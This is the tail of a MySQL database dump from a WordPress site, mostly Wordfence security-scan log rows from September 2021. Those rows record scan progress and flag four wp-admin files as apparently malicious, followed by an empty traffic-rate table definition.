second'),(4441,1631165824.114207,2,'info','Scanned contents of 941 additional files at 14.31 per second'),(4442,1631165825.151915,2,'info','Scanned contents of 960 additional files at 14.38 per second'),(4443,1631165826.174315,2,'info','Scanned contents of 977 additional files at 14.41 per second'),(4444,1631165827.212740,2,'info','Scanned contents of 994 additional files at 14.44 per second'),(4445,1631165828.239553,2,'info','Scanned contents of 1015 additional files at 14.53 per second'),(4446,1631165829.269260,2,'info','Scanned contents of 1045 additional files at 14.74 per second'),(4447,1631165830.293882,2,'info','Scanned contents of 1070 additional files at 14.88 per second'),(4448,1631165831.783198,2,'info','Scanned contents of 1082 additional files at 14.74 per second'),(4449,1631165833.223892,2,'info','Scanned contents of 1099 additional files at 14.68 per second'),(4450,1631165834.264003,2,'info','Scanned contents of 1112 additional files at 14.65 per second'),(4451,1631165835.298977,2,'info','Scanned contents of 1131 additional files at 14.70 per second'),(4452,1631165836.448236,2,'info','Scanned contents of 1148 additional files at 14.70 per second'),(4453,1631165837.473811,2,'info','Scanned contents of 1157 additional files at 14.63 per second'),(4454,1631165838.630719,2,'info','Scanned contents of 1161 additional files at 14.47 per second'),(4455,1631165838.865295,2,'info','Scanned contents of 1165 additional files at 14.47 per second'),(4456,1631165838.908027,2,'info','Asking Wordfence to check URLs against malware list.'),(4457,1631165838.944534,2,'info','Checking 3090 host keys against Wordfence scanning servers.'),(4458,1631165839.727122,2,'info','Done host key check.'),(4459,1631165840.658665,2,'info','Done file contents scan'),(4460,1631165840.678547,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/wpimages.php'),(4461,1631165840.709393,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/cachewpcheck.php'),(4462,1631165840.726087,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/index.php'),(4463,1631165840.757060,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/object-cache.php'),(4464,1631165840.778152,10,'info','SUM_ENDBAD:Scanning file contents for infections and vulnerabilities'),(4465,1631165840.817664,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(4466,1631165840.878395,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(4467,1631165840.905323,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(4468,1631165840.950604,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(4469,1631165841.443661,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(4470,1631165841.450891,2,'info','Checking 261 host keys against Wordfence scanning servers.'),(4471,1631165842.184087,2,'info','Done host key check.'),(4472,1631165842.237716,2,'info','Done examining URLs'),(4473,1631165843.067505,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(4474,1631165843.084110,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(4475,1631165843.427126,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(4476,1631165843.441160,10,'info','SUM_START:Scanning for weak passwords'),(4477,1631165843.447109,2,'info','Starting password strength check on 1 user.'),(4478,1631165843.533228,10,'info','SUM_ENDOK:Scanning for weak passwords'),(4479,1631165843.753555,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(4480,1631165845.459448,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(4481,1631165845.472556,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(4482,1631165846.085307,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(4483,1631165846.151035,10,'info','SUM_START:Scanning for suspicious site options'),(4484,1631165846.385758,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(4485,1631165846.406981,2,'info','Done examining URLs'),(4486,1631165846.562386,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(4487,1631165846.596204,1,'info','-------------------'),(4488,1631165846.606774,2,'info','Wordfence used 16.21 MB of memory for scan. Server peak memory usage was: 36.21 MB'),(4489,1631165846.617327,1,'info','Scan Complete. Scanned 4282 files, 2 plugins, 2 themes, 43 posts, 0 comments and 3610 URLs in 7 minutes 15 seconds.'),(4490,1631165846.637990,10,'info','SUM_FINAL:Scan complete. You have 1253 new issues to fix. See below.'),(4491,1631183064.784965,10,'info','SUM_PREP:Preparing a new scan.'),(4492,1631183064.791878,1,'info','Initiating quick scan'),(4493,1631183064.808340,10,'info','SUM_START:Checking Web Application Firewall status'),(4494,1631183064.819612,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(4495,1631183064.839795,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(4496,1631183064.902598,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(4497,1631183064.912525,1,'info','-------------------'),(4498,1631183064.917900,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 14 MB'),(4499,1631183064.920470,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(4500,1631183064.931102,10,'info','SUM_FINAL:Scan complete. You have 4 new issues to fix. See below.'),(4501,1631269289.419144,10,'info','SUM_PREP:Preparing a new scan.'),(4502,1631269289.487890,1,'info','Initiating quick scan'),(4503,1631269289.530503,10,'info','SUM_START:Checking Web Application Firewall status'),(4504,1631269289.565826,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(4505,1631269289.599293,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(4506,1631269289.739466,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(4507,1631269289.787582,1,'info','-------------------'),(4508,1631269289.808374,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(4509,1631269289.818814,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(4510,1631269289.829267,10,'info','SUM_FINAL:Scan complete. You have 4 new issues to fix. See below.'),(4511,1631355735.658735,10,'info','SUM_PREP:Preparing a new scan.'),(4512,1631355735.722034,1,'info','Initiating quick scan'),(4513,1631355735.784776,10,'info','SUM_START:Checking Web Application Firewall status'),(4514,1631355735.805338,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(4515,1631355735.866108,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(4516,1631355736.047163,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(4517,1631355736.089385,1,'info','-------------------'),(4518,1631355736.133768,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(4519,1631355736.154585,1,'info','Quick Scan Complete. Scanned in 1 second.'),(4520,1631355736.175687,10,'info','SUM_FINAL:Scan complete. You have 4 new issues to fix. See below.'),(4521,1631424613.977982,1,'info','Scheduled Wordfence scan starting at Sunday 12th of September 2021 05:30:13 AM'),(4522,1631424616.751552,10,'info','SUM_PREP:Preparing a new scan.'),(4523,1631424617.229073,1,'info','Contacting Wordfence to initiate scan'),(4524,1631424619.694345,10,'info','SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),(4525,1631424621.738365,10,'info','SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),(4526,1631424623.786247,10,'info','SUM_PAIDONLY:Checking if your site is on a domain blocklist is for paid members only'),(4527,1631424625.817414,10,'info','SUM_START:Checking for the most secure way to get IPs'),(4528,1631424628.221499,10,'info','SUM_ENDOK:Checking for the most secure way to get IPs'),(4529,1631424628.332761,10,'info','SUM_START:Scanning to check available disk space'),(4530,1631424628.362775,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(4531,1631424628.388561,2,'info','The disk has 3458566.66 MB available'),(4532,1631424628.416108,10,'info','SUM_ENDOK:Scanning to check available disk space'),(4533,1631424628.474357,10,'info','SUM_START:Checking Web Application Firewall status'),(4534,1631424628.498198,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(4535,1631424628.558134,10,'info','SUM_START:Checking for future GeoIP support'),(4536,1631424628.619846,10,'info','SUM_ENDOK:Checking for future GeoIP support'),(4537,1631424628.727547,10,'info','SUM_START:Checking for paths skipped due to scan settings'),(4538,1631424628.773151,10,'info','SUM_ENDOK:Checking for paths skipped due to scan settings'),(4539,1631424628.811939,2,'info','Getting plugin list from WordPress'),(4540,1631424629.060645,2,'info','Found 2 plugins'),(4541,1631424629.094900,2,'info','Getting theme list from WordPress'),(4542,1631424629.292505,2,'info','Found 2 themes'),(4543,1631424631.337612,10,'info','SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),(4544,1631424632.610174,10,'info','SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),(4545,1631424632.679597,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(4546,1631424632.717882,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(4547,1631424632.805377,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(4548,1631424632.829803,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(4549,1631424632.897830,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(4550,1631424632.928189,10,'info','SUM_DISABLED:Skipping theme scan'),(4551,1631424632.945242,10,'info','SUM_DISABLED:Skipping plugin scan'),(4552,1631424632.973477,10,'info','SUM_START:Scanning for known malware files'),(4553,1631424633.027172,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(4554,1631424633.239081,2,'info','500 files indexed'),(4555,1631424633.469103,2,'info','1000 files indexed'),(4556,1631424633.670347,2,'info','1500 files indexed'),(4557,1631424633.971487,2,'info','2000 files indexed'),(4558,1631424634.073326,2,'info','2349 files indexed'),(4559,1631424635.012116,2,'info','2849 files indexed'),(4560,1631424635.281115,2,'info','3349 files indexed'),(4561,1631424635.454185,2,'info','3849 files indexed'),(4562,1631424635.540614,2,'info','4266 files indexed'),(4563,1631424642.840826,2,'info','Analyzed 100 files containing 1.67 MB of data so far'),(4564,1631424648.593593,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(4565,1631424655.042972,2,'info','Analyzed 300 files containing 4.53 MB of data so far'),(4566,1631424661.035263,2,'info','Analyzed 400 files containing 7.23 MB of data so far'),(4567,1631424670.705858,2,'info','Analyzed 500 files containing 8.09 MB of data so far'),(4568,1631424676.471482,2,'info','Analyzed 600 files containing 8.77 MB of data so far'),(4569,1631424681.646155,2,'info','Analyzed 700 files containing 9.94 MB of data so far'),(4570,1631424687.785125,2,'info','Analyzed 800 files containing 15.37 MB of data so far'),(4571,1631424694.014926,2,'info','Analyzed 900 files containing 17.61 MB of data so far'),(4572,1631424699.814561,2,'info','Analyzed 1000 files containing 18.58 MB of data so far'),(4573,1631424704.479213,2,'info','Analyzed 1100 files containing 20.06 MB of data so far'),(4574,1631424712.324136,2,'info','Analyzed 1200 files containing 20.44 MB of data so far'),(4575,1631424719.043736,2,'info','Analyzed 1300 files containing 21.31 MB of data so far'),(4576,1631424725.892560,2,'info','Analyzed 1400 files containing 21.34 MB of data so far'),(4577,1631424732.591813,2,'info','Analyzed 1500 files containing 21.38 MB of data so far'),(4578,1631424738.873229,2,'info','Analyzed 1600 files containing 23.99 MB of data so far'),(4579,1631424743.824557,2,'info','Analyzed 1700 files containing 25.38 MB of data so far'),(4580,1631424753.835737,2,'info','Analyzed 1800 files containing 27.82 MB of data so far'),(4581,1631424760.876828,2,'info','Analyzed 1900 files containing 29.72 MB of data so far'),(4582,1631424773.175796,2,'info','Analyzed 2000 files containing 30.38 MB of data so far'),(4583,1631424777.958897,2,'info','Analyzed 2100 files containing 32.29 MB of data so far'),(4584,1631424788.776469,2,'info','Analyzed 2200 files containing 35.15 MB of data so far'),(4585,1631424795.410788,2,'info','Analyzed 2300 files containing 36.56 MB of data so far'),(4586,1631424802.371408,2,'info','Analyzed 2400 files containing 38.45 MB of data so far'),(4587,1631424809.346425,2,'info','Analyzed 2500 files containing 50.98 MB of data so far'),(4588,1631424816.477656,2,'info','Analyzed 2600 files containing 52.53 MB of data so far'),(4589,1631424825.796430,2,'info','Analyzed 2700 files containing 55.08 MB of data so far'),(4590,1631424833.740158,2,'info','Analyzed 2800 files containing 58.62 MB of data so far'),(4591,1631424838.704358,2,'info','Analyzed 2900 files containing 60.75 MB of data so far'),(4592,1631424844.319013,2,'info','Analyzed 3000 files containing 62.17 MB of data so far'),(4593,1631424852.854374,2,'info','Analyzed 3100 files containing 64.13 MB of data so far'),(4594,1631424860.354977,2,'info','Analyzed 3200 files containing 64.83 MB of data so far'),(4595,1631424867.892959,2,'info','Analyzed 3300 files containing 66.35 MB of data so far'),(4596,1631424878.634182,2,'info','Analyzed 3400 files containing 69 MB of data so far'),(4597,1631424888.154448,2,'info','Analyzed 3500 files containing 70.35 MB of data so far'),(4598,1631424896.052742,2,'info','Analyzed 3600 files containing 72.61 MB of data so far'),(4599,1631424904.174512,2,'info','Analyzed 3700 files containing 83.11 MB of data so far'),(4600,1631424914.515049,2,'info','Analyzed 3800 files containing 86.9 MB of data so far'),(4601,1631424924.932274,2,'info','Analyzed 3900 files containing 89.1 MB of data so far'),(4602,1631424934.667886,2,'info','Analyzed 4000 files containing 91.91 MB of data so far'),(4603,1631424941.999997,2,'info','Analyzed 4100 files containing 94.89 MB of data so far'),(4604,1631424949.380902,2,'info','Analyzed 4200 files containing 96.09 MB of data so far'),(4605,1631424959.159131,2,'info','Analyzed 4266 files containing 97.27 MB of data.'),(4606,1631424959.167956,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(4607,1631424959.228339,10,'info','SUM_ENDBAD:Scanning for unknown files in wp-admin and wp-includes'),(4608,1631424959.275499,10,'info','SUM_ENDOK:Scanning for known malware files'),(4609,1631424959.342364,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(4610,1631424959.379256,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(4611,1631424959.429635,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(4612,1631424959.500473,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(4613,1631424961.270056,2,'info','Starting scan of file contents'),(4614,1631424963.072108,2,'info','Scanned contents of 19 additional files at 18.50 per second'),(4615,1631424964.107103,2,'info','Scanned contents of 34 additional files at 16.49 per second'),(4616,1631424965.527108,2,'info','Scanned contents of 35 additional files at 10.05 per second'),(4617,1631424967.036721,2,'info','Scanned contents of 53 additional files at 10.62 per second'),(4618,1631424968.163182,2,'info','Scanned contents of 56 additional files at 9.15 per second'),(4619,1631424969.264485,2,'info','Scanned contents of 68 additional files at 9.42 per second'),(4620,1631424970.344530,2,'info','Scanned contents of 90 additional files at 10.84 per second'),(4621,1631424971.605869,2,'info','Scanned contents of 101 additional files at 10.56 per second'),(4622,1631424972.674846,2,'info','Scanned contents of 108 additional files at 10.16 per second'),(4623,1631424973.679431,2,'info','Scanned contents of 126 additional files at 10.83 per second'),(4624,1631424974.690185,2,'info','Scanned contents of 149 additional files at 11.78 per second'),(4625,1631424975.750910,2,'info','Scanned contents of 171 additional files at 12.48 per second'),(4626,1631424976.753098,2,'info','Scanned contents of 192 additional files at 13.05 per second'),(4627,1631424977.788923,2,'info','Scanned contents of 210 additional files at 13.34 per second'),(4628,1631424978.822372,2,'info','Scanned contents of 222 additional files at 13.23 per second'),(4629,1631424979.869242,2,'info','Scanned contents of 244 additional files at 13.69 per second'),(4630,1631424980.911881,2,'info','Scanned contents of 256 additional files at 13.57 per second'),(4631,1631424982.417361,2,'info','Scanned contents of 258 additional files at 12.66 per second'),(4632,1631424983.489088,2,'info','Scanned contents of 269 additional files at 12.54 per second'),(4633,1631424984.556993,2,'info','Scanned contents of 283 additional files at 12.57 per second'),(4634,1631424985.636263,2,'info','Scanned contents of 302 additional files at 12.80 per second'),(4635,1631424986.810349,2,'info','Scanned contents of 309 additional files at 12.48 per second'),(4636,1631424987.867933,2,'info','Scanned contents of 313 additional files at 12.12 per second'),(4637,1631424988.879454,2,'info','Scanned contents of 331 additional files at 12.33 per second'),(4638,1631424989.959553,2,'info','Scanned contents of 347 additional files at 12.43 per second'),(4639,1631424991.367855,2,'info','Scanned contents of 349 additional files at 11.90 per second'),(4640,1631424992.402488,2,'info','Scanned contents of 364 additional files at 11.99 per second'),(4641,1631424993.497631,2,'info','Scanned contents of 372 additional files at 11.83 per second'),(4642,1631424994.755189,2,'info','Scanned contents of 385 additional files at 11.77 per second'),(4643,1631424995.813987,2,'info','Scanned contents of 400 additional files at 11.85 per second'),(4644,1631424996.881077,2,'info','Scanned contents of 421 additional files at 12.09 per second'),(4645,1631424997.905506,2,'info','Scanned contents of 443 additional files at 12.35 per second'),(4646,1631424999.016814,2,'info','Scanned contents of 457 additional files at 12.36 per second'),(4647,1631425000.019441,2,'info','Scanned contents of 470 additional files at 12.38 per second'),(4648,1631425001.196499,2,'info','Scanned contents of 480 additional files at 12.26 per second'),(4649,1631425002.616534,2,'info','Scanned contents of 495 additional files at 12.20 per second'),(4650,1631425003.947019,2,'info','Scanned contents of 496 additional files at 11.84 per second'),(4651,1631425004.976730,2,'info','Scanned contents of 517 additional files at 12.04 per second'),(4652,1631425005.982030,2,'info','Scanned contents of 526 additional files at 11.97 per second'),(4653,1631425007.028335,2,'info','Scanned contents of 546 additional files at 12.14 per second'),(4654,1631425008.586384,2,'info','Scanned contents of 559 additional files at 12.01 per second'),(4655,1631425009.605275,2,'info','Scanned contents of 579 additional files at 12.17 per second'),(4656,1631425010.720607,2,'info','Scanned contents of 588 additional files at 12.08 per second'),(4657,1631425011.821331,2,'info','Scanned contents of 611 additional files at 12.27 per second'),(4658,1631425012.857015,2,'info','Scanned contents of 638 additional files at 12.56 per second'),(4659,1631425013.912184,2,'info','Scanned contents of 648 additional files at 12.49 per second'),(4660,1631425014.972538,2,'info','Scanned contents of 661 additional files at 12.49 per second'),(4661,1631425016.033842,2,'info','Scanned contents of 677 additional files at 12.54 per second'),(4662,1631425017.088535,2,'info','Scanned contents of 696 additional files at 12.64 per second'),(4663,1631425018.110977,2,'info','Scanned contents of 713 additional files at 12.72 per second'),(4664,1631425019.121633,2,'info','Scanned contents of 734 additional files at 12.86 per second'),(4665,1631425020.128978,2,'info','Scanned contents of 755 additional files at 13.00 per second'),(4666,1631425021.236565,2,'info','Scanned contents of 769 additional files at 12.99 per second'),(4667,1631425022.258301,2,'info','Scanned contents of 784 additional files at 13.02 per second'),(4668,1631425023.290463,2,'info','Scanned contents of 803 additional files at 13.11 per second'),(4669,1631425024.317012,2,'info','Scanned contents of 823 additional files at 13.22 per second'),(4670,1631425025.318520,2,'info','Scanned contents of 838 additional files at 13.24 per second'),(4671,1631425027.215742,2,'info','Scanned contents of 851 additional files at 13.06 per second'),(4672,1631425028.264440,2,'info','Scanned contents of 869 additional files at 13.12 per second'),(4673,1631425029.288014,2,'info','Scanned contents of 888 additional files at 13.21 per second'),(4674,1631425030.296014,2,'info','Scanned contents of 908 additional files at 13.30 per second'),(4675,1631425031.319738,2,'info','Scanned contents of 922 additional files at 13.31 per second'),(4676,1631425032.355977,2,'info','Scanned contents of 942 additional files at 13.40 per second'),(4677,1631425033.853802,2,'info','Scanned contents of 944 additional files at 13.15 per second'),(4678,1631425034.891460,2,'info','Scanned contents of 963 additional files at 13.22 per second'),(4679,1631425035.937110,2,'info','Scanned contents of 982 additional files at 13.29 per second'),(4680,1631425036.988860,2,'info','Scanned contents of 1003 additional files at 13.38 per second'),(4681,1631425038.019535,2,'info','Scanned contents of 1021 additional files at 13.44 per second'),(4682,1631425039.021719,2,'info','Scanned contents of 1034 additional files at 13.43 per second'),(4683,1631425040.059903,2,'info','Scanned contents of 1055 additional files at 13.52 per second'),(4684,1631425041.079271,2,'info','Scanned contents of 1075 additional files at 13.60 per second'),(4685,1631425042.695894,2,'info','Scanned contents of 1087 additional files at 13.48 per second'),(4686,1631425043.697426,2,'info','Scanned contents of 1107 additional files at 13.56 per second'),(4687,1631425044.743372,2,'info','Scanned contents of 1129 additional files at 13.65 per second'),(4688,1631425045.571457,2,'info','Scanned contents of 1146 additional files at 13.72 per second'),(4689,1631425045.582777,2,'info','Asking Wordfence to check URLs against malware list.'),(4690,1631425045.610715,2,'info','Checking 3075 host keys against Wordfence scanning servers.'),(4691,1631425046.404483,2,'info','Done host key check.'),(4692,1631425049.325504,2,'info','Done file contents scan'),(4693,1631425049.351352,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/wpimages.php'),(4694,1631425049.428690,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/cachewpcheck.php'),(4695,1631425050.040799,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/index.php'),(4696,1631425050.101595,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/object-cache.php'),(4697,1631425050.194801,10,'info','SUM_ENDBAD:Scanning file contents for infections and vulnerabilities'),(4698,1631425050.270715,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(4699,1631425050.386239,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(4700,1631425050.410916,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(4701,1631425050.474694,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(4702,1631425051.172413,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(4703,1631425051.185985,2,'info','Checking 261 host keys against Wordfence scanning servers.'),(4704,1631425051.932022,2,'info','Done host key check.'),(4705,1631425051.960407,2,'info','Done examining URLs'),(4706,1631425052.244164,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(4707,1631425052.348325,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(4708,1631425053.658909,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(4709,1631425054.075800,10,'info','SUM_START:Scanning for weak passwords'),(4710,1631425054.141179,2,'info','Starting password strength check on 1 user.'),(4711,1631425054.294288,10,'info','SUM_ENDOK:Scanning for weak passwords'),(4712,1631425054.362371,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(4713,1631425056.059541,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(4714,1631425056.113755,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(4715,1631425056.734621,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(4716,1631425056.792773,10,'info','SUM_START:Scanning for suspicious site options'),(4717,1631425057.124918,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(4718,1631425057.132757,2,'info','Done examining URLs'),(4719,1631425057.304221,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(4720,1631425057.351378,1,'info','-------------------'),(4721,1631425057.363596,2,'info','Wordfence used 18.23 MB of memory for scan. Server peak memory usage was: 38.23 MB'),(4722,1631425057.377235,1,'info','Scan Complete. Scanned 4266 files, 2 plugins, 2 themes, 43 posts, 0 comments and 3599 URLs in 7 minutes 19 seconds.'),(4723,1631425057.388088,10,'info','SUM_FINAL:Scan complete. You have 1234 new issues to fix. See below.'),(4724,1631442068.768050,10,'info','SUM_PREP:Preparing a new scan.'),(4725,1631442068.772526,1,'info','Initiating quick scan'),(4726,1631442068.784954,10,'info','SUM_START:Checking Web Application Firewall status'),(4727,1631442068.795030,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(4728,1631442068.813359,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(4729,1631442068.833221,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(4730,1631442068.842918,1,'info','-------------------'),(4731,1631442068.847269,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(4732,1631442068.857241,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(4733,1631442068.859006,10,'info','SUM_FINAL:Scan complete. You have 4 new issues to fix. See below.'),(4734,1631528494.431991,10,'info','SUM_PREP:Preparing a new scan.'),(4735,1631528494.473581,1,'info','Initiating quick scan'),(4736,1631528494.500045,10,'info','SUM_START:Checking Web Application Firewall status'),(4737,1631528494.516000,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(4738,1631528494.548801,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(4739,1631528494.669435,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(4740,1631528494.695974,1,'info','-------------------'),(4741,1631528494.716859,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(4742,1631528494.727390,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(4743,1631528494.737809,10,'info','SUM_FINAL:Scan complete. You have 4 new issues to fix. See below.'),(4744,1631615031.778312,10,'info','SUM_PREP:Preparing a new scan.'),(4745,1631615031.837397,1,'info','Initiating quick scan'),(4746,1631615031.894993,10,'info','SUM_START:Checking Web Application Firewall status'),(4747,1631615031.915360,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(4748,1631615031.977533,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(4749,1631615032.167646,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(4750,1631615032.211279,1,'info','-------------------'),(4751,1631615032.251843,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(4752,1631615032.272065,1,'info','Quick Scan Complete. Scanned in 1 second.'),(4753,1631615032.292676,10,'info','SUM_FINAL:Scan complete. You have 4 new issues to fix. See below.');
/*!40000 ALTER TABLE `wp_wfstatus` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wftrafficrates`
--

DROP TABLE IF EXISTS `wp_wftrafficrates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wftrafficrates` (
  `eMin` int(10) unsigned NOT NULL,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `hitType` enum('hit','404') NOT NULL DEFAULT 'hit',
  `hits` int(10) unsigned NOT NULL,
  PRIMARY KEY (`eMin`,`IP`,`hitType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wftrafficrates`
--

LOCK TABLES `wp_wftrafficrates` WRITE;
/*!40000 ALTER TABLE `wp_wftrafficrates` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wftrafficrates` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2023-02-01  0:02:05